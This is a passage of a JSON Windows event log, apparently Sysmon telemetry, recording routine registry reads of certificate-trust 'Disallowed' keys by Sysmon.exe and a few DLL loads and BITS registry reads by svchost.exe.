{ - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "twinapi.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 